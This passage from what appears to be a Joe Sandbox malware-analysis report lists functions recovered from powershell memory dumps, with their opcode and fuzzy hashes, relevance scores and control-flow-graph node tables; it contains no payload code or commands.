                                                                    Function 04BD8800 Relevance: .0, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b654a2a696a922436ff48179c1a3b98a23111d8a8d558543c58e2ecb82cdda0
                                                                    • Instruction ID: abeb3df78104a4995e464f00c1a3ae18bb83f0b127843b04bed92b1a423991c0
                                                                    • Opcode Fuzzy Hash: 9b654a2a696a922436ff48179c1a3b98a23111d8a8d558543c58e2ecb82cdda0
                                                                    • Instruction Fuzzy Hash: 67E02634E0820ADFC708DFE4D45686EBFF0EB44200B0085A8EE5A83306E630A801DBC1
                                                                    Function 04BDF618 Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                    • Instruction ID: 9e8ee79f5e8b50d27c44c5e55f9155660952df56fa6cf1abb971e5e10a0c7395
                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                    • Instruction Fuzzy Hash: BED067B0D042099F8B84EFADC94156EFBF4EB4C200F6085AE8919E7351F7329A12CBD1
                                                                    Function 04BD8748 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e3e8c4e5fdc3957b1fe1ed2657fef9aab56277f90c5ec7b37a6379927b15d96
                                                                    • Instruction ID: b5025a90d669096a1c53059179832c6a0a87cd671e874c81bfc31e6810643e14
                                                                    • Opcode Fuzzy Hash: 3e3e8c4e5fdc3957b1fe1ed2657fef9aab56277f90c5ec7b37a6379927b15d96
                                                                    • Instruction Fuzzy Hash: F6D067319051098BCB0CEBA5E86B4BDBB74FA14302F4151ADDA2752291EE316A5ACAC5
                                                                    Function 04BD8810 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1a4c2141059a286219ea7dd45c15f46cbd0834185f99a452b9e11e5477561cca
                                                                    • Instruction ID: 0f33173a54d639964a19daf33df69f5c157713bddf9ca5441f994930c95aad04
                                                                    • Opcode Fuzzy Hash: 1a4c2141059a286219ea7dd45c15f46cbd0834185f99a452b9e11e5477561cca
                                                                    • Instruction Fuzzy Hash: 3DD05E34E0920A8FCB08EFA4E45686EBFB4EB44301F0051A9EE5A93344FA30AC01CFC1
                                                                    Function 04BD7EA0 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 329ad5749fdc7f861fdb374b665b2b96cf6409563466192afbc1a066137fda6d
                                                                    • Instruction ID: e0582fcf454d1c267b56e2fafba21d96d0696c412b541a2b57117acd9c8a20e2
                                                                    • Opcode Fuzzy Hash: 329ad5749fdc7f861fdb374b665b2b96cf6409563466192afbc1a066137fda6d
                                                                    • Instruction Fuzzy Hash: 25C0021481E3D40EEF1387358999602BFB6194351970A62C6D181CA466C4A88848C753
                                                                    Function 04BD7938 Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b8bb1b2f9afc19d34a478aa5d5c7a8820b349e4c19379c3278f313252773622e
                                                                    • Instruction ID: 5e3e92889a8442206afff38cf739536755f774b7b71702b93a694b022337c0bc
                                                                    • Opcode Fuzzy Hash: b8bb1b2f9afc19d34a478aa5d5c7a8820b349e4c19379c3278f313252773622e
                                                                    • Instruction Fuzzy Hash: 39C08C3418A3C48FCB1ACF38E4548587F25AF0222431614DCE84A5F6B7CAB280C6CF05
                                                                    Function 04BD7940 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6cc272ea6dd0985e5f92ad2404ca7fb78c5cd0b1d1e6c23a47496e1bb84905e5
                                                                    • Instruction ID: 542ad1aed6b4c6219f60ea6daa926b8ff63aabea01ff96edf30b036ff2c0c4b2
                                                                    • Opcode Fuzzy Hash: 6cc272ea6dd0985e5f92ad2404ca7fb78c5cd0b1d1e6c23a47496e1bb84905e5
                                                                    • Instruction Fuzzy Hash: 71B092301857488FC2496F75A804814B32DAB4021538104A8E90E5A6A68EBAE8D5CA44

                                                                    Non-executed Functions

                                                                    Function 04BD4D62 Relevance: 7.6, Strings: 6, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6n^$6n^$6n^$6n^$6n^$6n^
                                                                    • API String ID: 0-1022129601
                                                                    • Opcode ID: 531eb15628a844b81f3c312af33b95ab9c162bfe546b9326cb45ac4a2b66aa63
                                                                    • Instruction ID: c7e1e1c9129606e6d84b6f4732dab4437ad8c2bb3f4d0b73f40d151f6bd3dcf5
                                                                    • Opcode Fuzzy Hash: 531eb15628a844b81f3c312af33b95ab9c162bfe546b9326cb45ac4a2b66aa63
                                                                    • Instruction Fuzzy Hash: 0D417D2520E3C09FC3279B3C89A45823FB0AF9729471A01DBC1C5CF6A3E9656C1AC763
                                                                    Function 04BD4BB0 Relevance: 7.6, Strings: 6, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6n^$6n^$6n^$6n^$6n^$6n^
                                                                    • API String ID: 0-1022129601
                                                                    • Opcode ID: 4d4cc4eb1f03d6dfc4d8a3e616ccee77c88ac1937140894216ddd48f1c3719fc
                                                                    • Instruction ID: 879882605f0814a1738bb79d3079a9b0cb58971466e07369c94d9f467c8de4d6
                                                                    • Opcode Fuzzy Hash: 4d4cc4eb1f03d6dfc4d8a3e616ccee77c88ac1937140894216ddd48f1c3719fc
                                                                    • Instruction Fuzzy Hash: 84411B1241F3D19FD727973889A81827FB0AE53294B1F02CBC1C4CF4A3E869185AC767
                                                                    Function 04BD4C62 Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6n^$6n^$6n^$6n^$6n^
                                                                    • API String ID: 0-3416343871
                                                                    • Opcode ID: 3f9b21b1b6f2f456248e33ce95fcd09f62c999b8d0f224d16e43788b8819ac9e
                                                                    • Instruction ID: c49345c19e5d822cd7454f3f30b605c8611a63250d76cab11eefbf8355a471c5
                                                                    • Opcode Fuzzy Hash: 3f9b21b1b6f2f456248e33ce95fcd09f62c999b8d0f224d16e43788b8819ac9e
                                                                    • Instruction Fuzzy Hash: 9321D81254F3C19FC727873989A81827FB0AF63294B1E01DBC1D48F4A3D869185AC767

                                                                    Execution Graph

                                                                    Execution Coverage:6%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:3
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 22999 8196490 23000 81964d3 SetThreadToken 22999->23000 23001 8196501 23000->23001

                                                                    Executed Functions

                                                                    Function 041BB49B Relevance: .3, Instructions: 253COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 522 41bb49b-41bb4b9 523 41bb4bb 522->523 524 41bb4be-41bb7f9 call 41baab4 522->524 523->524 585 41bb7fe-41bb805 524->585
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d09924f14cef0f322dd5a5e932710057d3ff9313ba47a841bdcc49c4ec124d83
                                                                    • Instruction ID: 2e0d8797cc6b9739b6062fc044eeb4ae889916bd97f766367e32e8820a2bb288
                                                                    • Opcode Fuzzy Hash: d09924f14cef0f322dd5a5e932710057d3ff9313ba47a841bdcc49c4ec124d83
                                                                    • Instruction Fuzzy Hash: 31916FB0F017559BEB19EBB489505AEBBF3EF84700B40891DD146AB740DF74AD068BC5
                                                                    Function 041BB4A0 Relevance: .3, Instructions: 252COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 586 41bb4a0-41bb4b9 587 41bb4bb 586->587 588 41bb4be-41bb7f9 call 41baab4 586->588 587->588 649 41bb7fe-41bb805 588->649
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4efd9167235a4c9513313f2d2eda671026d212414b2c8a4ce98f147a0a3f79ef
                                                                    • Instruction ID: c5c63a3d723740517b6fbdfe7172903b3df973e53f7027dd26e7b42e137e078a
                                                                    • Opcode Fuzzy Hash: 4efd9167235a4c9513313f2d2eda671026d212414b2c8a4ce98f147a0a3f79ef
                                                                    • Instruction Fuzzy Hash: E7916DB0F017599BEB19EBB489505AEBBF3EF84700B40891DD10AAB740DF74AD068BD5
                                                                    Function 07022308 Relevance: 8.1, Strings: 6, Instructions: 641COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2269783597.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7020000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk$piRk$piRk$piRk$piRk$|,Tk
                                                                    • API String ID: 0-884015819
                                                                    • Opcode ID: 94cce03931e5fee5c72d8499188c6424d164cb31f1a20a080b5ae99b151bd809
                                                                    • Instruction ID: 25a9b20fa03e4af97191b752a4a08eb3f718abdc694da82e9a7fdea4509c25b2
                                                                    • Opcode Fuzzy Hash: 94cce03931e5fee5c72d8499188c6424d164cb31f1a20a080b5ae99b151bd809
                                                                    • Instruction Fuzzy Hash: D6226AB2B04226CFDB618FE8C4017AEBBE5BFC5210F15867AD514CB251DB31C846D7A2
                                                                    Function 08196489 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 206 8196489-81964cb 207 81964d3-81964ff SetThreadToken 206->207 208 8196508-8196525 207->208 209 8196501-8196507 207->209 209->208
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2273093740.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_8190000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3254676861-0
                                                                    • Opcode ID: 9711cf01ecb4ecc964113136aec2cb7e986c6b9684a522458e483521231d9dc6
                                                                    • Instruction ID: 4301d5eec7d602fe64fb95bfe1682f106664cc8955fdccd0e3c8270abadab441
                                                                    • Opcode Fuzzy Hash: 9711cf01ecb4ecc964113136aec2cb7e986c6b9684a522458e483521231d9dc6
                                                                    • Instruction Fuzzy Hash: AC1116B59007498FDB10DF9AD984BDEFBF4AF88320F24841ED559A7210C7B4A944CFA1
                                                                    Function 08196490 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 212 8196490-81964ff SetThreadToken 214 8196508-8196525 212->214 215 8196501-8196507 212->215 215->214
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2273093740.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_8190000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3254676861-0
                                                                    • Opcode ID: 19034450dc51581ea6e9cebf3acba51245fc8f16d463d77a33174e24a5da515d
                                                                    • Instruction ID: e2fc226fbed301ea11987f878d276cc2a00f51dda0272f54e43abc754c3b25b4
                                                                    • Opcode Fuzzy Hash: 19034450dc51581ea6e9cebf3acba51245fc8f16d463d77a33174e24a5da515d
                                                                    • Instruction Fuzzy Hash: D91125B59003498FDB10DF9AC984B9EFBF8AF48320F24841AD518A3310C7B8A944CFA1
                                                                    Function 041BE63B Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 218 41be63b-41be6b6 226 41be73a-41be753 218->226 227 41be6bc-41be6d3 218->227 229 41be75e 226->229 230 41be755 226->230 241 41be6d5 call 41be7b8 227->241 242 41be6d5 call 41be7b7 227->242 233 41be75f 229->233 230->229 232 41be6db-41be738 232->226 232->227 233->233 241->232 242->232
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk
                                                                    • API String ID: 0-1603274793
                                                                    • Opcode ID: 7eb90f67c93bbcd85ea505049effe725d85cb26242ca811ef6de48aaf44d3c95
                                                                    • Instruction ID: 55e44295322bbdab49ce6c47b13ba851249fbc57db0e1c3ebdf1a18d0412657f
                                                                    • Opcode Fuzzy Hash: 7eb90f67c93bbcd85ea505049effe725d85cb26242ca811ef6de48aaf44d3c95
                                                                    • Instruction Fuzzy Hash: 10311370A01206DFCB15DF69D994ADEBBF2BB88304F148969E41AA7390DB74AD05CB90
                                                                    Function 041BE640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 243 41be640-41be6b6 250 41be73a-41be753 243->250 251 41be6bc-41be6d3 243->251 253 41be75e 250->253 254 41be755 250->254 265 41be6d5 call 41be7b8 251->265 266 41be6d5 call 41be7b7 251->266 257 41be75f 253->257 254->253 256 41be6db-41be738 256->250 256->251 257->257 265->256 266->256
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk
                                                                    • API String ID: 0-1603274793
                                                                    • Opcode ID: 9aa91da06d83e7b33dc39e286f334bfdeb718ff4951f3b558ba632d7191e8ab6
                                                                    • Instruction ID: df1cde4c0bc5a8b098724fc2649ff0fb180e97bd997cf5ba0c90e02170291fd1
                                                                    • Opcode Fuzzy Hash: 9aa91da06d83e7b33dc39e286f334bfdeb718ff4951f3b558ba632d7191e8ab6
                                                                    • Instruction Fuzzy Hash: CA310470A01606DFCB15DF69D994ADEBBF2FF88304F148968D41AA7390DB74AD05CB90
                                                                    Function 07023CE8 Relevance: .6, Instructions: 582COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 267 7023ce8-7023d0d 268 7023d13-7023d18 267->268 269 7023f00-7023f4a 267->269 270 7023d30-7023d34 268->270 271 7023d1a-7023d20 268->271 277 7023f50-7023f55 269->277 278 70240ce-70240ec 269->278 275 7023eb0-7023eba 270->275 276 7023d3a-7023d3c 270->276 272 7023d22 271->272 273 7023d24-7023d2e 271->273 272->270 273->270 279 7023ec8-7023ece 275->279 280 7023ebc-7023ec5 275->280 281 7023d3e-7023d4a 276->281 282 7023d4c 276->282 284 7023f57-7023f5d 277->284 285 7023f6d-7023f71 277->285 297 702407a-702407d 278->297 298 70240ee-7024112 278->298 286 7023ed0-7023ed2 279->286 287 7023ed4-7023ee0 279->287 283 7023d4e-7023d50 281->283 282->283 283->275 291 7023d56-7023d75 283->291 289 7023f61-7023f6b 284->289 290 7023f5f 284->290 294 7024080-702408a 285->294 295 7023f77-7023f79 285->295 292 7023ee2-7023efd 286->292 287->292 289->285 290->285 329 7023d77-7023d83 291->329 330 7023d85 291->330 301 7024097-702409d 294->301 302 702408c-7024094 294->302 299 7023f7b-7023f87 295->299 300 7023f89 295->300 305 7024228-702425d 298->305 306 7024118-702411d 298->306 307 7023f8b-7023f8d 299->307 300->307 309 70240a3-70240af 301->309 310 702409f-70240a1 301->310 331 702428b-7024295 305->331 332 702425f-7024281 305->332 312 7024135-7024139 306->312 313 702411f-7024125 306->313 307->294 311 7023f93-7023fb2 307->311 314 70240b1-70240cb 309->314 310->314 348 7023fc2 311->348 349 7023fb4-7023fc0 311->349 318 70241da-70241e4 312->318 319 702413f-7024141 312->319 315 7024127 313->315 316 7024129-7024133 313->316 315->312 316->312 324 70241f1-70241f7 318->324 325 70241e6-70241ee 318->325 326 7024143-702414f 319->326 327 7024151 319->327 333 70241f9-70241fb 324->333 334 70241fd-7024209 324->334 335 7024153-7024155 326->335 327->335 338 7023d87-7023d89 329->338 330->338 336 7024297-702429c 331->336 337 702429f-70242a5 331->337 367 7024283-7024288 332->367 368 70242d5-70242fe 332->368 342 702420b-7024225 333->342 334->342 335->318 343 702415b-702415d 335->343 345 70242a7-70242a9 337->345 346 70242ab-70242b7 337->346 338->275 347 7023d8f-7023d96 338->347 351 7024177-702417e 343->351 352 702415f-7024165 343->352 353 70242b9-70242d2 345->353 346->353 347->269 354 7023d9c-7023da1 347->354 358 7023fc4-7023fc6 348->358 349->358 361 7024180-7024186 351->361 362 7024196-70241d7 351->362 359 7024167 352->359 360 7024169-7024175 352->360 355 7023da3-7023da9 354->355 356 7023db9-7023dc8 354->356 365 7023dab 355->365 366 7023dad-7023db7 355->366 356->275 379 7023dce-7023dec 356->379 358->294 369 7023fcc-7024003 358->369 359->351 360->351 370 702418a-7024194 361->370 371 7024188 361->371 365->356 366->356 386 7024300-7024326 368->386 387 702432d-702435c 368->387 392 7024005-702400b 369->392 393 702401d-7024024 369->393 370->362 371->362 379->275 391 7023df2-7023e17 379->391 386->387 399 7024395-702439f 387->399 400 702435e-702437b 387->400 391->275 418 7023e1d-7023e24 391->418 397 702400f-702401b 392->397 398 702400d 392->398 395 7024026-702402c 393->395 396 702403c-7024077 393->396 401 7024030-702403a 395->401 402 702402e 395->402 396->297 397->393 398->393 403 70243a1-70243a5 399->403 404 70243a8-70243ae 399->404 412 70243e5-70243ea 400->412 413 702437d-702438f 400->413 401->396 402->396 410 70243b0-70243b2 404->410 411 70243b4-70243c0 404->411 415 70243c2-70243e2 410->415 411->415 412->413 413->399 419 7023e26-7023e41 418->419 420 7023e6a-7023e9d 418->420 426 7023e43-7023e49 419->426 427 7023e5b-7023e5f 419->427 433 7023ea4-7023ead 420->433 428 7023e4b 426->428 429 7023e4d-7023e59 426->429 431 7023e66-7023e68 427->431 428->427 429->427 431->433
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2269783597.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7020000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7215e1b2dab18937c14f8c7e7a5e47dfe12e01aee3ebb4a502963c6f19d3e0ce
                                                                    • Instruction ID: 6c6f927c945aa6bd00b27f5c03a927563d13fecece737f0dd116bcf3cab671fe
                                                                    • Opcode Fuzzy Hash: 7215e1b2dab18937c14f8c7e7a5e47dfe12e01aee3ebb4a502963c6f19d3e0ce
                                                                    • Instruction Fuzzy Hash: 89128AB2B04261DFCB658BB8D4007AABBE29FC1214F14866AE505CB391DB35DC47D7A2
                                                                    Function 041BE7B8 Relevance: .3, Instructions: 254COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 438 41be7b8-41be7d8 439 41be7da-41be7dc 438->439 440 41be7e1-41be7ee 438->440 441 41beb41-41beb48 439->441 443 41be7f0-41be801 440->443 445 41be803-41be825 call 41b014c 443->445 450 41be82b 445->450 451 41be988-41be99f 445->451 452 41be82d-41be83e 450->452 459 41bea7b-41bea87 451->459 460 41be9a5 451->460 455 41be840-41be842 452->455 457 41be85c-41be8e5 455->457 458 41be844-41be84a 455->458 487 41be8ec-41be921 457->487 488 41be8e7 457->488 461 41be84e-41be85a 458->461 462 41be84c 458->462 466 41beb39 459->466 467 41bea8d-41beaa4 459->467 463 41be9a7-41be9b8 460->463 461->457 462->457 471 41be9ba-41be9bc 463->471 466->441 467->466 480 41beaaa 467->480 472 41be9be-41be9c4 471->472 473 41be9d6-41bea0e 471->473 475 41be9c8-41be9d4 472->475 476 41be9c6 472->476 491 41bea10 473->491 492 41bea15-41bea4a 473->492 475->473 476->473 483 41beaac-41beabd 480->483 490 41beabf-41beac1 483->490 504 41be92b 487->504 505 41be923 487->505 488->487 493 41beadb-41beb09 490->493 494 41beac3-41beac9 490->494 491->492 508 41bea4c 492->508 509 41bea54 492->509 512 41beb0b-41beb16 493->512 513 41beb35-41beb37 493->513 497 41beacb 494->497 498 41beacd-41bead9 494->498 497->493 498->493 504->451 505->504 508->509 509->459 518 41beb19 call 41be7b8 512->518 519 41beb19 call 41be92e 512->519 520 41beb19 call 41be7b7 512->520 521 41beb19 call 41bea57 512->521 513->441 515 41beb1f-41beb33 515->512 515->513 518->515 519->515 520->515 521->515
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 53a65d5eb74652339fafc5e3268a7df78e528875eeb3cde2ed8018e68f347a6a
                                                                    • Instruction ID: 15d222e5e92667faa6761c35c9a3b210396fb5b316c4d55b2a6af69e0ebcd67e
                                                                    • Opcode Fuzzy Hash: 53a65d5eb74652339fafc5e3268a7df78e528875eeb3cde2ed8018e68f347a6a
                                                                    • Instruction Fuzzy Hash: 83915A74B10214CFCB24DFB8D5946ADBBE6AF88710B1580AAD946E7354EF70EC02CB90
                                                                    Function 041B29F0 Relevance: .2, Instructions: 210COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 650 41b29f0-41b2a1e 651 41b2af5-41b2b37 650->651 652 41b2a24-41b2a3a 650->652 656 41b2b3d-41b2b56 651->656 657 41b2c51-41b2c61 651->657 653 41b2a3f-41b2a52 652->653 654 41b2a3c 652->654 653->651 661 41b2a58-41b2a65 653->661 654->653 659 41b2b5b-41b2b69 656->659 660 41b2b58 656->660 659->657 667 41b2b6f-41b2b79 659->667 660->659 662 41b2a6a-41b2a7c 661->662 663 41b2a67 661->663 662->651 668 41b2a7e-41b2a88 662->668 663->662 669 41b2b7b-41b2b7d 667->669 670 41b2b87-41b2b94 667->670 671 41b2a8a-41b2a8c 668->671 672 41b2a96-41b2aa6 668->672 669->670 670->657 673 41b2b9a-41b2baa 670->673 671->672 672->651 674 41b2aa8-41b2ab2 672->674 675 41b2baf-41b2bbd 673->675 676 41b2bac 673->676 677 41b2ac0-41b2af4 674->677 678 41b2ab4-41b2ab6 674->678 675->657 680 41b2bc3-41b2bd3 675->680 676->675 678->677 682 41b2bd8-41b2be5 680->682 683 41b2bd5 680->683 682->657 686 41b2be7-41b2bf7 682->686 683->682 687 41b2bf9 686->687 688 41b2bfc-41b2c08 686->688 687->688 688->657 691 41b2c0a-41b2c24 688->691 692 41b2c29 691->692 693 41b2c26 691->693 694 41b2c2e-41b2c38 692->694 693->692 695 41b2c3d-41b2c50 694->695
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4382e0d424bdd83d56db22a4d2ce8258a37f15e17feee739995f802d25b7be31
                                                                    • Instruction ID: be3f0733380e7671c07039ebce868d260d5b6feae39439de0ed73413221df008
                                                                    • Opcode Fuzzy Hash: 4382e0d424bdd83d56db22a4d2ce8258a37f15e17feee739995f802d25b7be31
                                                                    • Instruction Fuzzy Hash: 60916A74A00205CFCB15CF59C5D89AEBBB1FF88310B2486A9D955AB7A5C735FC41CBA0
                                                                    Function 041B7728 Relevance: .2, Instructions: 158COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
